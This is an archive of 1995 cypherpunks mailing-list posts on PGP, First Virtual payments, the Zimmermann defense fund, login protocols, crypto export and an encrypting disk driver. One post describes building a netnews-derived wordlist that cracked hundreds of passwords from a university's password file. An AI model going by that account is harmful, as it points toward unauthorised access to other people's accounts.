Date: Tue, 25 Jul 95 14:48:53 PDT
To: cypherpunks@toad.com
Subject: Re: PGP message and keyring format
In-Reply-To: <199507252142.OAA10281@jobe.shell.portal.com>
Message-ID: <9507252148.AA16643@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Does anyone know of any documentation describing the format of PGP
> messages and keyrings, so that other applications can send and receive 
> PGP-compatible messages and work with PGP keyrings?

RTFM. The document you seek is actually in the distribution.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@yak.net>
Date: Tue, 25 Jul 95 12:07:59 PDT
To: adam@bwh.harvard.edu (Adam Shostack)
Subject: Re: big word listing
In-Reply-To: <199507242154.OAA05021@comsec.com>
Message-ID: <199507251751.RAA00418@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text


% | see if the password is in it.  My question is, are there any pre-built lists of
% | this nature?  I am currently only using a spelling dictoinary, and would like
% | somthing a little bigger.

I made one really easily once with a tiny awk program that read files
and remembered all the words (in a big table, with the old
``table[word]=1'' trick, then iterate the table and print it out).  
I probably used 'tr -cd' in front of it to get rid of non-alfa stuff.

I fed it netnews -- especially hierachries with folklore, unix,
rec.all, sex, etc.   And it made a dictionary that cracked several
hundred passwords (from a Major University /etc/passwd) in about 24
hours of SparcStation II time (i think ... this was six years ago).

I remember finding the word 'creat' -- doubtless obtained from the unix
wizards group -- and a whole family of machine-generated accounts whose
password was 'pw'.  I'm not sure these words exist in dictionaries, but
they do in netnews and passwords.

anyway -- it's fun to make your own.

	strick






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 25 Jul 95 15:03:21 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Zimmerman legal fund
In-Reply-To: <23424.9507181545@exe.dcs.exeter.ac.uk>
Message-ID: <gk5Ka3_Mc50eIssw1J@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 23-Jul-95 Re: Zimmerman legal fund
aba@dcs.exeter.ac.uk (5163)

> Anon writes:
> > Could someone in the know talk about the relationship between FV and
> > the ZLDF? I don't like to spread misinformation, so I won't answer
> > based on conjectures.

> I'd be interested to hear this too, but what I am concerned about is
> that the whole thing is too strongly tied to first virtual.

The relationship is a completely open and friendly one, without any
strings attached that I'm aware of.

What most of you probably don't know is that FV has been a supporter of
Phil Zimmerman's since long before you heard of us.  We have had Phil on
a monthly retainer since before the public rollout of our service (which
probably means since before you even *heard* of First Virtual, since we
didn't make any vaporware announcements).  We've done this in order to
get some advice on cryptography and some help with some specific needs
(pgp-telnet, for example), but mostly we've done it because we thought
he both needed and deserved our support.

Why would a startup company want to devote significant resources to
supporting Phil?  Basically, we felt it was the right thing to do,
particularly in our case.  Here's why:  like most net citizens, we
believe that the people deserve free access to cryptography.  However,
we had just invented something nobody had ever imagined before -- a way
to do reasonably safe net commerce *without* cryptography.  Now, we
thought this would be a good thing for society in its own right, for
many reasons that would be a real digression here, but we recognized
that every technology has both a good side and a bad side.  Insofar as
electronic commerce was going to be the motivating factor for permitting
universal access to cryptography, FV's technology is/was a bad thing,
because it decreases (at least somewhat) that motivation.  We believe
the positive features of our technology outweigh this negative, but we
also felt we had a moral duty to lend our support to public access to
cryptography, to try to offset any negative effect that our invention
might have in that regard.

So, FV has been a friend of Phil's for a long time.  We launched the
Yellow Ribbon campaign and the FV-based fundraising drive in that
spirit, though clearly it doesn't exactly hurt us if people sign up for
FV in order to donate to Phil.  That really wasn't our motivation,
however, and we sought to underscore that fact by making a donation to
Phil's defense fund every time people sign up for a new account
expressly in order to donate to ZLDF.  In other words, if you are a
Zimmerman supporter and you were thinking it might be nice to have an FV
account anyway, you can help Phil even more by signing up and paying
your $2 fee through the ZLDF pages.

We've had lots of discussions with Phil Z and Phil D, and any time they
expressed any discomfort with any of our ideas, we dropped them.  There
are two web sites basically because they are taking care of the
informational aspects and we're concentrating (pro bono) on the online
fundraising aspects.  If we've overly stressed FV as a collection
mechanism, I apologize, but you must bear in mind that we've been living
and breathing the FV payment system for 18 months now, and it would be
kind of hard for us not to even *mention* it.  :-)

> I mean there was the Yellow Ribbon Campaign but all URLs out of that
> page point to FV, no mention of the at least two other (more
> convenient for most people, and hence in Phil Zs interests) methods:

> a) PGPed email CC no. to Phil Dubois (Phil Zs chief legal counsel)

> b) similar PGPed email CC no. to some guy in Europe who was offering
> to collect up all of the European donations, and send them to Dubois
> in lump sums to save on currency exchange costs.

Well, only on the cypherpunks list would you be likely to find general
agreement that PGP'ed credit card numbers are "easier" than First
Virtual.  Many thousands of extremely naive net citizens are now happy
FV customers, and I seriously doubt that most of them could master PGP
without a full-day tutorial.  (We're not talking about rocket scientists
here, folks.)

Mostly, though, I felt that the FV/ZLDF association was extremely
important to defuse any potential political arguments of the form "FV
has proven that public access to crypto is unnecessary."  Such arguments
would hurt the crypto cause, and would NOT sit well with the FV team,
either.  The truth is we're completely on the same side of this issue,
folks.  No hidden agendas, I promise.  

On behalf of First Virtual, I encourage everyone to donate money to
ZLDF, using any mechanism that works.   Better yet, use them all.  --
Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net (http://www.netresponse.com/zldf)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ncra@ix.netcom.com (NCRA )
Date: Tue, 25 Jul 95 18:20:20 PDT
To: cypherpunks@toad.com
Subject: DOS Script Programming Request
Message-ID: <199507260118.SAA19016@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


To any interested party:

I need 3 simple DOS scripts to be writter or translated from a UNIX 
script to DOS. The scripts need to do the following:

1) Look into a specific directory and execute a .bat file that will 
sign encrypt the file(s) in the directory using Viacrypt's PGP and wipe 
out the original.  It then needs to move the cyphertext file(s) to a 
second directory.

2) The second script needs to log on to a netcom account, enter user id 
and password and upload the cyphertext files in the second directory 
using Z-modem transpher.  The netcom account is already programmed to 
mail the files to the correct address.  It then needs to logout and 
move the transfered files to a third directory.

3) The 3rd script needs to delete all files in the third directory that 
are over 15 days old on the 1st and 15th of each month.

The first two scripts need to run on a timer and in sequential order on 
a daily basis.  

That's it.

If you are interested, let me know and I will fill you in on specific 
details. Also include a proposed charge for the programming.

Thanks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Tue, 25 Jul 95 16:47:21 PDT
To: support-payout-failure@card.com
Subject: You have cashed my check....
Message-ID: <Pine.BSI.3.91.950725170206.8971A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear First Virtual,

You now present puzzling information.

You have cashed my check.
So why are you telling me that you have no bank information.
You stated that the check itself provided the bank information.
If this situation persists,
I will forward said materials and
correspondence to the State of Minnesota Attorney General's Office,
and the U.S. District Attorney's Office for prosecution.
For what you have connumicated so far surely appears fraudulent.

I don't have much money as it is. But then maybe (considering all of
the lag time) this is your scam. Maybe this is entirely legitimate,
and just an honest mistake.

I have added below your opening correspodence of July 18th, the day 
before the check cashed.

Awaitng your response,

Carol Anne Braddock

Exhibit #1 - Acct. Acceptance Status

From carolann@censored.orgTue Jul 25 17:50:44 1995
Date: Tue, 25 Jul 1995 17:24:22 -0500
From: UnCensored Girls Anonymous <carolann@censored.org>
To: cab@censored.org

X-UIDL: 805661824.000
From: sgcs-server@card.com
To: carolann@censored.org
Y-Tag: 950611397619
Subject: newacct-result
Comments: generated by via-btl.tcl - Enabled Mail (EM) environment for UNIX
Date: Mon, 10 Jul 1995 15:35:00 -0400
Reply-to: support-newacct@card.com
X-Status: 


The account for Carol Anne Braddock is now activated.  
Your First Virtual account identifier is:

    newt-carolann

Please SAVE YOUR FIRST VIRTUAL ACCOUNT IDENTIFIER, and use it when you
buy or sell information.  (NOTE: This account identifier differs from
the ID-choice that you provided when you applied for your account.  We
have added a unique prefix.)

You may begin using your account to sell information over the Internet
immediately!

Exhibit #2 Your Letter Today.

From sgcs-server@card.comTue Jul 25 18:32:24 1995
Date: Tue, 25 Jul 1995 18:23:24 -0500
From: sgcs-server@card.com
To: cab8@censored.org
Subject: change in account status

This is an automated message from First Virtual's Internet Payment System.

When we tried to verify the the bank account information associated with
Carol Anne Braddock, the verification failed.

    
    INVALID ACCOUNT NUMBER


Once this matter is corrected, we will be able to pay you for your
sales.  If you have changed your checking account, please follow the
directions below.  Otherwise, please send e-mail to:

    support-payout-failure@card.com


CHANGING THE CHECKING ACCOUNT NUMBER USED FOR PAYMENT

If you wish to change the account number of the checking account used
to pay you, please send e-mail to:

    chgacct@card.com

The ENTIRE body of your message should contain EXACTLY two lines:

    Account-ID: your First Virtual account identifier
    Financial-Changes: yes

We will send you a confirming note.  After you confirm, we will send
you e-mail with a new application-ID and instructions on sending us a
check for $10.00 (ten US dollars, to cover our paper processing
expenses).

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 25 Jul 95 09:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <v01510103ac39a90b698b@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain


>
>Instead of that, send H(pid,clock,hostname,H(password)) to the server, for
>some hash function H().  Then the server only needs to keep H(password)
>around, rather than the plain password.  This is similar to current
>systems, except the plain password isn't sent across the network.
>
>H() can be whatever you fancy; 25 crypts, MD5, SHA-1, etc.  Of course,
>I'm sure this is far from being a new idea...

Keeping H(password) on the server and logging in with H(blob,H(password)) is
no different than keeping the password on the server and logging in with
H(blob,password).  Anyone who can read the password file on the server can
authenticate himself.

To protect against packet sniffers monitoring your login stream _and_
system crackers looking at the password file, you need some form of PKC.

Free-after-1997 example:
        g is a generator of a prime p.

        password is X (0<X<p);

        password file has g^X mod p.

        login server generates Y, issues challenge g^Y.
        expected response is g^XY mod p

        login client has X, generates (g^Y)^X = g^XY mod p.

        J. Random SuperHacker can get g^X, and g^Y, but not g^XY.

Free-after-2000 example.
        Server Has RSA Public Key
        Client has Private Key.

        Server generates challenge.

        Client signs [Hash of] challenge.



--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Tue, 25 Jul 95 19:29:27 PDT
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: "Only on the Cypherpunks list..."
Message-ID: <ac3af6120f021004a990@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 PM 7/25/95, Nathaniel Borenstein wrote:

>Well, only on the cypherpunks list would you be likely to find general
>agreement that PGP'ed credit card numbers are "easier" than First
>Virtual.  Many thousands of extremely naive net citizens are now happy
>FV customers, and I seriously doubt that most of them could master PGP
>without a full-day tutorial.  (We're not talking about rocket scientists
>here, folks.)

A lot of truth here...sometimes the perfect is the enemy of the good.

After all, only on the Cypherpunks list would you be likely to find general
agreement that setting up a separate Intel box running Linux so one can
create a suitable mail client is the preferred way to do secure e-mail?

(Smileys for the :=)-impaired...I have nothing against Linux, and even
browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a
Mac user.")

I have no idea what First Virtual's current or future business plans are,
but I do expect more solid encryption, a la PGP or "real" RSA (licensed),
will be coming soon. I assume FV is planning for this likely development.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (UnCensored Girls Anonymous)
Date: Tue, 25 Jul 95 17:52:13 PDT
To: ekr@eit.COM (Eric Rescorla)
Subject: Re:  You have cashed my check....
Message-ID: <199507260052.RAA21103@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Look at the .sig
And if it's a system that's vaporware
we all need know about it.

And if it is corrected, part 17/713 will have begun to
go it's job, in a 'realworld' situation.

>Please don't send this here. It has no place on this list.
>
>-Ekr
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 25 Jul 95 12:37:47 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE: Regulatory Arbitrage - Free Speech Server
Message-ID: <1298.9507251936@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



The Free Speech Server
----------------------

In an attempt to preempt senator Exon and his thought police, and to
demonstrate to such other utterly misguided, utterly clueless
net-illiterates who somehow get ahold of the notion that it is even
*possible* to censor peoples words and conversations on the Internet,
that what they seek is indeed impossible.

This is a simple demo of why it is impossible to censor the net.  The
Net is international, and in the apt words of Tim May's .sig quote:

  "National borders are just speed bumps on the information superhighway."

The concept of "Regulatory Arbitrage" term meaning of course: shopping
for suitable regulations, so if the US has silly "indecency" laws,
well just store your words in another jurisdiction.


Free Speech Server, jurisdiction Netherlands
--------------------------------------------

Alex de Joode has kindly hosted an exon(tm) free speech server on
replay.com:

	http://www.replay.com/exon/

is an automated double-speak translator.  It will translate between
text in goverment approved thought policed language back into free
speech.

So, the canonical example, a comlaint against Senator Exon (spit),
Exonized(tm) so that even the most zealous US government internet
thought police could not complain:

----------------------------------------------------------------------
  Senator Exon may I express my annoyance you're a person who is
  overly sensitive to vulgar speech.  This has lowered my opinion of you
  considerably for your work on the communications decency bill.

  President Clinton and his crowd of law enforcement officials seem to
  be overly keen in their attempts to regulate the information super
  highway.  

  In my opinion they are just understandably scared of losing their much
  abused so called legitimate wiretap capabilities.  It seems highly
  inappropriate that incompetents like you should be deciding matters
  about which you have little knowledge.
----------------------------------------------------------------------

Feed that into the WWW forms interface on www.replay.com (click on the
unexonize toggle button, and select the "exon" dictionary, and you get
back my original message to Exon, ahh much better this really says
what I had to say:

----------------------------------------------------------------------
  X-Regulatory-Arbitrage-URL: http://www.replay.com/exon/
  X-Authors-Preferred-Speech: exon
  X-Comment: Regulatory Arbitrage in action, free speech server NL


  Exon fuck you you're a prudish prick. May you rot in hell for your
  work on the government censorship bill.

  Slick Willy and his gang of jack booted thugs seem to be fucking
  falling over themselves in their attempts to censor the net.

  In my opinion they are just scared shitless of losing their illegal
  wiretaps. It seems fucking way out of order that assholes like you
  should be deciding matters about which you know squat.
----------------------------------------------------------------------


The mechanism used to do the translation is phrase replacement, there
are facilities for you to add your own phrases if the dictionaries do
not cover what you want to say.  Please join in and add your own
phrases, so that the dictionaries get more interesting.

It works by replacing phrases, so in the above:

'fuck you'                    <->   'may I express my annoyance'
'fucking way out of order'    <->   'highly inappropriate'
'know squat'		      <->   'have little knowledge'

etc.

Jurisdictional Information
--------------------------

The first server is located in the Netherlands, so there are liberal
pornography laws, lower age of consent, no thought crimes, freedom of
speech, and privacy are still valued, the are no restrictions on
"indecent speech", no restrictions on crypto export, etc, etc.

The idea is that in your own jurisdiction (US or other oppressive
regime with government censorship) you are only saying something
within the bounds of censored government speech and thought guidlines,
and yet you have a comment, which says what language you *would* use
if you weren't being censored, ie you inculde as a header, or a
comment in your post what your preferred speech is in terms of a
selection of "exon" dictionaries:

	X-Authors-Preferred-Speech: exon,legislese,sarcasm

You haven't actually *said* anything which would require 'correction'
by the thought police, rather you have just said what words you would
use if you were allowed to.

You could also view it as a form of (weak) text stego, saying one
thing, but meaning another to a sufficient extent to maintain
plausible deniability.

Uses
----

It is starting to look like the US will have in place a set of
regulations which will make it illegal to use "vulgar speech" or
"indecent speech" on the internet.  In fact it is looking like you
will be able to say less on the internet than could be written in a
book in a bookstore or library.

Whilst the above example was in terms of 4 letter words, there are
dictionaries for several topics, which you as user of the system you
can add phrase to for your amusement:

exon:      "fuck you"               <->    "may I express my annoyance"
sex:       "good fuck"              <->    "good sleep"
violence:  "kick the shit out of"   <->    "have a minor disagreement"
sarcasm:   "that prick Exon"        <->    "most honorable Sen Exon esq"
legislese: "pillage and loot"       <->    "govern"
legislese: "tyrannically suppress"  <->    "provide protections against"
graphic:   "lobotomised barney gif" <->    "we love barney"
crypto:    "fcrypt module"          <->    "conventional poetry quatrain"

The sky and your imagination is the limit.

Oh yes, and 'May I express my annoyance Senator Exon!' :-)

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 25 Jul 95 21:02:07 PDT
To: cypherpunk@toad.com
Subject: cypherpunks-lite
Message-ID: <199507260359.UAA01559@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Does anyone have eric blossom's email address? I'd like to sub
to his cpunks-lite.

Thanks,
-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel Hames" <jhames@mail.deltanet.com>
Date: Tue, 25 Jul 95 22:35:36 PDT
To: cypherpunks@toad.com
Subject: Re: Banks on the Net (Was: Re: Questions about Conferences)
Message-ID: <9507260535.AA28774@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


In my previous post, I asked about the security of First Security 
National Bank, which doesn't exist.

Enzo is right, I was wondering if anyone had information on the 
security of Security First National Bank (www.sfnb.com).

Thanks
Joel Hames
jhames@deltanet.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Tue, 25 Jul 95 21:03:02 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
Message-ID: <v0213050aac3b0b3f670f@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 7/24/95, Timothy C. May wrote:
>At 12:54 PM 7/23/95, Bob Snyder wrote:
>>tcmay@sensemedia.net said:
>>> With regard to SSL and Netscape not being open to outside developers,
>>> several leading e-mail outfits, including Qualcomm, Netscape,
>>> Frontier, etc., are working on an interoperable secure e-mail
>>> standard called "Secure/MIME," or "S/MIME."
>>
>>Do you have sources for this information?  MOSS is out there at least as a
>>Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the
>>original author of Eudora, is pretty active in the MIME community and I doubt
>>he would support a second MIME type to do the same thing...
>
>Some of you have expressed skepticism about the mention of "S/MIME."
[snip]

All MOSS does is designate the MIME Headers/etc to support Encrypting
and/or Signing MIME Parts. It says nothing as to how you do the Encoding or
create Signature - only how to package the two parts into a MIME format
once you have them. Thus S/MIME is/could-be an implementation of MOSS (as
would be a MUA that used the MOSS formats to package a PGP signature or
Encrypted Message).

For those who want to read the docs, just send this message:

>To: mailserv@ds.internic.net
>From: YOUR-ADDRESS-GOES-HERE
>
>ENCODING mime
>FILE /internet-drafts/draft-ietf-pem-mime-08.txt
>FILE /internet-drafts/draft-ietf-pem-sigenc-03.txt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jed@blaze.cs.jhu.edu (Jeremy Rauch)
Date: Tue, 25 Jul 95 19:31:55 PDT
To: cypherpunks@toad.com
Subject: Re: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key)
In-Reply-To: <9507251516.AA21669@spirit.aud.alcatel.com>
Message-ID: <3v49e6$9sj@blaze.cs.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Daniel R. Oelke (droelke@spirit.aud.alcatel.com) wrote:

: > of PGP...would you?

: I would use a precompiled version of PGP *if* it came from
: and was signed by someone I trusted.
: After all - I don't read all the source code - do you?

You mean you don't?!!!
But seriously, I get it directly from MIT, check the checksums, etc.  I'm
pretty sure that it hasn't been tampered with.  And, actually, I've read
a good deal of the source code...especially the rsaref library.  Not cause
I'm paranoid, just interested.
If I get the source code from, say, my friend, who I trust, who got it from 
someone he trusted, and so on down the line, the line of trust falls into
question.  Who's to say someone doesn't like someone on that line, and
modifies the code...don't you have "friends" you don't like? :)


: > And, note, it says sustantial change in value...I don't know if this is taken
: > to mean monetary, or usability...the later might work.  
: > It's an interesting idea.
: > Jeremy
: > 
: I would say that if you can sell something that people
: would otherwise get for free, then you have added value.
: So, pre-compile for a couple of architectures, and then
: slap them on a CD-ROM with source.  
: Definite tangable value from the CD-ROM then.

: Dan
: ------------------------------------------------------------------
: Dan Oelke                                  Alcatel Network Systems
: droelke@aud.alcatel.com                             Richardson, TX
: http://spirit.aud.alcatel.com:8081/~droelke/

--
 ____________________________________________________________________________
| Jeremy Rauch              .--~~,__   |                                     |
|              :-....,-------`~~'._.'  |         jed@cs.jhu.edu              |
|               `-,,,  ,_      ;'~U'   |    alhambra@jhu.edu                 |
| Johns Hopkins  _,-' ,'`-__; '--.     |         jed@jhunix.hcf.jhu.edu      |
|   University  (_/'~~      ''''(;     |     http://server.cs.jhu.edu/~jed   |
|______________________________________|_____________________________________|
Finger for PGP key
				Member, *the Guild

          The light that burns twice as bright burns half as long




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christian Lagerberg" <clg@glab.se>
Date: Wed, 26 Jul 95 03:41:31 PDT
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <199507261038.GAA27424@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ANGAENDE                 mailing list

hit me :=)

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBYbGCoZzwIn1bdtAQGOJwF/bMkdrpPv/62bbIv+mlD4XjS9P5+bgezu
RBQLRMZSSUkcL2RYa4kfUGCs5mO3ZVQ/
=KtMP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 26 Jul 95 04:54:18 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <ac3af6120f021004a990@[205.199.118.202]>
Message-ID: <8k5WhM_Mc50e0ssz9y@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 25-Jul-95 "Only on the Cypherpunks li.. Timothy C.
May@sensemedi (1596*)

> I have no idea what First Virtual's current or future business plans are,
> but I do expect more solid encryption, a la PGP or "real" RSA (licensed),
> will be coming soon. I assume FV is planning for this likely development.

Well, one thing we've announced in public is that if/when Visa and
MasterCard actually announce the encryption standard that they have said
they're going to define, we will support it.  Basically, our attitude
towards encryption has been that the lack of widely-agreed-upon
standards and lack of widespread deployment were show-stoppers for
large-scale commerce.  Our hope is that if Visa & MC agree on a format,
it won't have those problems.  We didn't think that FV itself had enough
clout to set an encryption standard for the world, nor did we see enough
of a bandwagon behind the current PGP format (or any others).  So we
concentrated on making commerce work without encryption, building up our
customer base, our customer service department, and so forth.  We're
promising our sellers as smooth a transition to the eventual standards
as we can possibly manage...  -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 26 Jul 95 07:53:18 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com>
Message-ID: <199507261447.AA17788@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hal said:
> This sounds very good if it already is almost working.  The TCP
> connection which is opened would have to be to a server on the local
> machine, so it would be important that the software support that.  Also,
> the local SOCKS relay would of course not want its winsock calls to be
> intercepted and translated in this way, so there would need to be some
> alternative way to access "vanilla" winsock.  Can you give any
> more information on the NEC work?

This should be fairly straightforward: take the existing winsock.dll
or winsock32.dll and rename it. Install the NEC DLL with the old
winsock's name, then have the NEC DLL do a LoadLibrary() to attach the
original version.

> I have written a simple dummy relay for winsock and it requires a pretty
> different programming style than for Unix.  Netscape has a habit of
> firing off a bunch of requests at once, so it has to be extremely
> asynchronous.  For Windows this means you get a windows message every
> time a packet arrives and use non-blocking I/O.  In Unix this is usually
> handled by forking a new process to handle each independent connection.
> Non-blocking I/O can be used in Unix but I don't think there is a
> non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
> a more Unix-style communication model, though.  Should the proxy require
> Windows 95, or will Windows 3 still be in widespread use for another
> year or two?

Asynchronous requests are the best way to implement I/O under Windows
(3.1, '95, and NT.) Any app that's threaded (Free Agent and Netscape
come to mind) will benefit, as will any user who's using a
multiprocessor machine.

If you're willing to assume the existence of Win95 or WinNT, you can
always spawn a new thread for each connection.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBZVcafb4pLe9tolAQHrHwQAhBAtIAZnaL2gh1BhZeE6WWQ1UQK7ffB2
XRZReUNzAVpCyvllKPDiN5TgUSuit8XeB4BzHOStXkNMJGlLE0vqTr5j5y2S0Fzo
nisi5Ve5+8XWJ8wFrshldfFcLyFuOK3LeL9cAKXQQrQ2GdxluusqBzqYHFM8koPP
zWI2YiF0VHM=
=yzFt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 26 Jul 95 10:03:19 PDT
To: cypherpunks@toad.com
Subject: Encrypting block driver for Linux...need some advice
Message-ID: <Pine.LNX.3.91.950726091131.129A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

All,

I dropped off the face of the earth for a few months while fighting a 
particularly *nasty* divorce, and to nurse my wounds, I immersed myself 
in writing cypto-code :)

What I've come up with is a loadable module block device driver for Linux 
that implements transparent encryption/decryption (is there a generic 
word that means both, like 'cryption' or some such?).

The way it works is by 'attaching' a filespec to the block driver, and 
translating block requests into read/write requests at the appropriate 
offset in the file.  During the read or write, the data is transformed 
with either DES or 3DES (RSAREF implementation).  The key is an MD5 hashed 
passphrase entered by the user when attaching the filespec.  The key is 
not stored anywhere, and there is no hidden structure to the ciphertext 
(such as a header block.)

The filespec can represent pretty much anything--another block device 
such as a hard drive partition or floppy drive, a regular file, a remote 
NFS exported file, CDROM, whatever.  If the file is remote, only ciphertext
is transmitted on the wire.

This part is working rather well at this point (as long as everything is 
done as root), which brings me to the crux of my post.

Being a Unix programming novice (lots of C experience on DOS/Windows), 
I'm pretty clueless when it comes to Unix level security issues.  I need 
to define and implement the appropriate behavior of the device when 
dealing with access to the data by different users.  Ideally, I want 
